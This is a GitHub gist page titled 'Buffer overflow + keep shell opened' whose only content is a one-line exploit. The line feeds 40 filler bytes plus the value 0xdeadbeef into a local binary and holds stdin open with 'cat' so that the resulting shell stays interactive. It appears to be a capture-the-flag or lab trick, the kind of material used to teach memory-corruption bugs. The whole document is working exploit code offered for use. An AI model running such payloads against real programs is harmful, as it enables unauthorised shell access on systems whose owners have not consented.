Skip to content

Instantly share code, notes, and snippets.

@stevenroh
Created May 11, 2019 16:15
Show Gist options
  • Save stevenroh/b07cd41792a8fc328f330f9dba8134d2 to your computer and use it in GitHub Desktop.
Save stevenroh/b07cd41792a8fc328f330f9dba8134d2 to your computer and use it in GitHub Desktop.
Buffer overflow + keep shell opened

(python -c "print 'A'*40 + '\xef\xbe\xad\xde'"; cat) | ./bin

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment